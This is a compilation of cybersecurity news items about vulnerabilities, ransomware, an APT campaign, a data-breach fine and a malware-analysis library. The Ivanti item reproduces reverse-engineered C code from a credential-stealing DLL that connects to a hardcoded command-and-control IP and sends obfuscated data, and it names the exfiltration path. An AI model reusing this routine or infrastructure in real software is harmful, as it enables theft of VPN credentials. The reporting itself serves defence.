-
Cybersecurity researchers have disclosed details of a new campaign that exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
An aggressive SEO poisoning campaign has surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.
Attackers have registered lookalike domains such as
ivanti-pulsesecure.comandivanti-secure-access.orgto host trojanized installers that appear official.Unsuspecting victims clicking on top search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti’s Secure Access Client.
The trojanized installer carries a credential-stealing DLL, designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.
.webp)
Example of Bing search results with a poisoned website (Source – Zscaler) Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content without any download links, evading quick detection by analysts and security scanners.
Only users arriving via search engine referrals—particularly from Bing—are shown the malicious download button, exploiting the HTTP Referrer header to cloak the true intent of the pages.
Once downloaded, the MSI installer drops two malicious DLLs—
dwmapi.dllandpulseextension.dll—signed by a legitimate certificate authority to further bypass security controls..webp)
The threat actor’s fake Ivanti Pulse Secure download website (Source – Zscaler) These DLLs embed a sequence of routines to locate and parse the Ivanti connection store (
connectionstore.dat), extracting saved URIs and credentials.Delving into the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.
The following C code snippet illustrates the socket setup and data exchange routine:-
WSADATA was; WSAStartup(MAKEWORD(2,2), &wsa); int sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in addr = {0}; addr.sin_family = AF_INET; addr.sin_port = htons(8080); inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr); connect(sock, (struct sockaddr*)&addr, sizeof(addr)); // Receive 48 bytes recv(sock, buf, 0x30, 0); // XOR deobfuscation for(int i=0;i<0x30;i++) buf[i]^=key[i]; // Send 52-byte obfuscated payload send(sock, buf, 0x34, 0);.webp)
Reverse-engineered code showing network communication logic (Source – Zscaler) After the initial handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the path
/incomeshit, a colloquial label for exfiltration channels.Because the IP resides within Microsoft Azure’s range, security teams may overlook these connections as benign cloud traffic.
By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the potency of search engine poisoning as an initial access vector.
Organizations should validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.
Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Qilin ransomware–an increasingly prolific ransomware-as-a-service (RaaS) operation–has intensified its global extortion campaigns by exploiting a covert network of bulletproof hosting (BPH) providers. These rogue hosting services, often headquartered in secrecy-friendly jurisdictions and operated through labyrinthine shell-company structures, allow Qilin’s operators and affiliates to host malware, data leak sites, and command-and-control infrastructure with near impunity. In […]
The post Qilin Ransomware Leverages Ghost Bulletproof Hosting for Global Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A newly disclosed vulnerability in Samba’s WINS server hook script enables unauthenticated attackers to run arbitrary commands on affected domain controllers. This critical flaw, tracked as CVE-2025-10230, carries a maximum CVSSv3.1 score of 10.0, reflecting its ease of exploitation and devastating impact on confidentiality, integrity, and availability. Overview of the Vulnerability The issue arises when […]
The post Critical Samba Flaw Allows Remote Attackers to Execute Arbitrary Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The UK’s Information Commissioner’s Office (ICO) has imposed a £14 million fine on outsourcing giant Capita following a major cyber attack in 2023 that exposed the personal data of 6.6 million individuals.
This penalty, split as £8 million to Capita plc and £6 million to Capita Pension Solutions Limited, marks one of the largest data protection fines in recent UK history.
The breach highlighted critical shortcomings in corporate cybersecurity, affecting pension schemes and sensitive personal information across hundreds of organizations.
The incident unfolded on March 22, 2023, when an employee unwittingly downloaded a malicious file onto a company device, granting hackers initial access to Capita’s network.
Despite a high-priority security alert triggering within 10 minutes and some automated responses activating, Capita failed to isolate the infected device for 58 hours, far exceeding their one-hour target response time.
This delay allowed the attackers to deploy malware, escalate privileges, and move laterally across systems, exfiltrating nearly one terabyte of data between March 29 and 30.
By March 31, ransomware was deployed, resetting user passwords and locking Capita staff out of their systems, which disrupted services for clients, including local councils, the NHS, and pension providers.
Capita Data Breach Exposes Sensitive Data
The stolen data encompassed pension records, staff details, and customer information from over 600 organizations, with 325 pension schemes directly impacted.
Sensitive elements included financial data, criminal records, and special category information such as health or ethnic details for some victims.
The ICO received at least 93 complaints from affected individuals reporting anxiety and stress over potential identity theft and fraud.
The ICO’s probe uncovered multiple failures in Capita’s data protection practices, violating UK GDPR requirements for secure processing.
Notably, Capita lacked a tiered administrative account model, enabling easy privilege escalation and unauthorized network traversal vulnerabilities flagged in prior assessments but unaddressed.
Their Security Operations Centre was chronically understaffed, consistently missing response targets for alerts in the months leading up to the attack.
Additionally, critical systems handling millions of records underwent penetration testing only at commissioning, with no follow-ups, and findings remained siloed within business units rather than organization-wide.
These lapses left vast amounts of personal data exposed to significant risk, amplifying the breach’s scale.
Information Commissioner John Edwards emphasized that “Capita failed in its duty to protect the data entrusted to it by millions of people,” underscoring the preventable nature of the incident through basic measures like the principle of least privilege and timely alert responses.
Originally facing a £45 million provisional fine, Capita negotiated it down to £14 million via a voluntary settlement, admitting liability without appeal.
Capita offered 12 months of free credit monitoring to affected individuals through Experian, with over 260,000 activations, and established a dedicated support hotline.
CEO Adolfo Hernandez acknowledged the event as part of a wave of attacks on UK firms, reaffirming commitments to data security for public and private sector clients.
The ICO urged organizations to follow NCSC guidance on preventing lateral movement, conduct regular risk assessments, and prioritize security staffing.
With ongoing legal actions from victims, Capita’s total costs may yet rise, emphasizing accountability in an era of escalating ransomware threats.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Capita To pay £14 Million For Data Breach Exposes 6.6 Million Users Personal Data appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Penetration testing helps organizations ensure IT systems are secure, but it should never be treated in a one-size-fits-all approach. Traditional approaches can be rigid and cost your organization time and money – while producing inferior results. The benefits of pen testing are clear. By empowering “white hat” hackers to attempt to breach your system using similar tools and techniques to
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The UK’s Information Commissioner’s Office has imposed a £14 million penalty on Capita following a major cyber attack in March 2023 that exposed the personal information of 6.6 million people. The fine was split between Capita plc, which received £8 million, and its subsidiary Capita Pension Solutions Limited, which was fined £6 million. The breach […]
The post Capita Fined £14 Million After Data Breach Exposes 6.6 Million Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
In a recently uncovered campaign, the Mysterious Elephant advanced persistent threat (APT) group has executed a sophisticated series of intrusions against government and foreign policy agencies across the Asia-Pacific region. The latest operations, active since early 2025, rely on custom-built malware modules and modified open-source utilities to target and siphon off documents, images, and archives […]
The post Mysterious Elephant APT Breach: Hackers Infiltrate Organization to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Since its public debut in October 2025, nightmare has quickly become a vital tool for malware analysts seeking to streamline static and dynamic analysis workflows.
Developed by Elastic Security Labs, nightmare brings together mature open-source reverse engineering components under a unified Python API.
Rather than forcing users to juggle disparate dependencies, nightmare leverages Rizin via rz-pipe for disassembly and the Unicorn engine for lightweight emulation.
This cohesive design empowers researchers to rapidly craft configuration extractors, carve IoCs, and automate recurring analysis tasks.
Emerging from a need to reduce code duplication across Elastic’s internal tooling, nightmare builds on practices honed over thousands of sample analyses.
Elastic analysts noted that many proprietary scripts suffered from fragile dependency chains and inconsistent abstractions.
By encapsulating common patterns—such as pattern matching, instruction emulation, and cross-reference enumeration—within a robust library, nightMARE provides a stable foundation for both seasoned and novice reverse engineers.
Upon installation, nightmare exposes three main modules: analysis, core, and malware. The analysis module integrates Rizin to enable disassembly, hex-pattern searches, and function enumeration.
The core module offers utilities for bitwise operations, regex-based extraction, and data casting.
Finally, the malware module groups family-specific extractors—ranging from Smokeloader to LUMMA—into versioned sub-packages that demonstrate real-world uses of the API.
Elastic researchers identified a significant spike in LUMMA stealer campaigns in mid-2025, underscoring the value of rapid configuration extraction.
Through nightmare’s emulation capabilities, analysts can instantiate a WindowsEmulator, register Import Address Table (IAT) hooks on APIs such as Sleep, and execute targeted code sequences in seconds.
By intercepting decryption routines in-process, nightMARE automates the recovery of C2 domains without manual unpacking or debugger-driven tracing.
Infection Mechanism and Emulation-Driven Extraction
nightMARE’s emulation framework offers a lightweight alternative to full-scale sandboxing. Consider the common technique where malware invokes Sleep before proceeding to C2 decryption.
The following code snippet demonstrates how nightMARE’s WindowsEmulator hooks Sleep in a LUMMA sample, capturing timing behavior and enabling uninterrupted emulation:-
import pathlib from nightMARE.analysis import emulation def sleephook(emu: emulation.WindowsEmulator, args): print(f"Sleep {emu.unicorn.reg_read(emulation.unicorn.x86_const.UC_X86_REG_ECX)} ms") emu.do_return() def main(): path = pathlib.Path(r"C:\samples\DismHost.exe") emu = emulation.WindowsEmulator(is_32bits=False) emu.load_pe(path.read_bytes(), stack_size=0x10000) emu.enable_iat_hooking() emu.set_iat_hook(b"KERNEL32.dll!Sleep", sleephook) emu.unicorn.emu_start(0x140006404, 0x140006412).webp)
LUMMA manually pushes Steam profile data for decryption (Source – Elastic) By intercepting the Sleep call, the emulator advances past timing obfuscation and resumes execution at the next instruction.
Combined with
emu.get_data()andemu.get_xrefs_from(), analysts reconstruct decryption key and nonce addresses, allocate memory buffers, and invoke the malware’s ChaCha20 routine directly.Ultimately, nightMARE outputs a decrypted list of C2 domains, ready for threat intelligence ingestion.
With version 0.16, Elastic Security Labs continues to expand nightMARE’s repertoire, adding emulation support for additional API hooks, enhancing pattern-matching accuracy, and refining malware module templates.
As emerging threats exploit novel obfuscation and packing schemes, nightMARE stands poised to accelerate analysis pipelines and empower the community’s collective defense.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post New nightMARE Python Library to Analyze Malware and Extract Intelligence Indicators appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The Apache Software Foundation has disclosed a critical vulnerability in its ActiveMQ NMS AMQP Client that could allow attackers to execute arbitrary code on vulnerable systems.
Tracked as CVE-2025-54539, this deserialization flaw poses a serious risk to applications relying on the client for messaging over AMQP protocols.
The issue was publicly detailed in an advisory on October 15, 2025, urging immediate upgrades to mitigate potential exploits.
The vulnerability stems from improper handling of untrusted data during connections to AMQP servers. Specifically, in versions up to and including 2.3.0, the client processes unbounded deserialization logic that malicious servers can abuse.
By crafting specially designed responses, attackers could trigger remote code execution on the client side, potentially compromising entire networks or applications.
This deserialization weakness has long been a vector for sophisticated attacks, as it bypasses typical input validation and directly manipulates object states in memory.
Apache ActiveMQ Vulnerability
Efforts to secure the client weren’t foolproof. Starting with version 2.1.0, Apache introduced allow and deny lists to restrict deserialization, aiming to limit what classes could be instantiated from incoming data.
However, security researchers at Endor Labs discovered that these controls could be circumvented under specific conditions, such as through cleverly nested objects or alternative serialization paths.
This bypass effectively nullified the protection, leaving users exposed to the full scope of the flaw. The discovery highlights the challenges in securing legacy serialization mechanisms, especially in .NET environments where binary formats have been a staple.
As .NET 9 deprecates binary serialization a move by Microsoft to curb similar risks Apache is now weighing the complete removal of this support from the NMS API in upcoming releases.
This shift aligns with broader industry trends toward safer alternatives like JSON or Protocol Buffers, reducing the attack surface for deserialization-based exploits.
Mitigations
To address CVE-2025-54539, Apache recommends upgrading to version 2.4.0 or later, where the deserialization logic has been fortified against these attacks.
For projects still tied to .NET binary serialization, migrating to modern formats is essential as a hardening measure.
Organizations using ActiveMQ in distributed systems, such as financial services or IoT infrastructures, should prioritize patching to prevent lateral movement by threat actors.
Discovered by Endor Labs’ Security Research Team, this vulnerability underscores the need for vigilant third-party dependency management.
With a CVSS score indicating important severity, unpatched instances could invite ransomware or data exfiltration.
Developers are advised to scan their supply chains and test connections to external AMQP brokers, ensuring no untrusted endpoints can influence client behavior.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Critical Apache ActiveMQ Vulnerability Let Attackers Execute Arbitrary Code appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
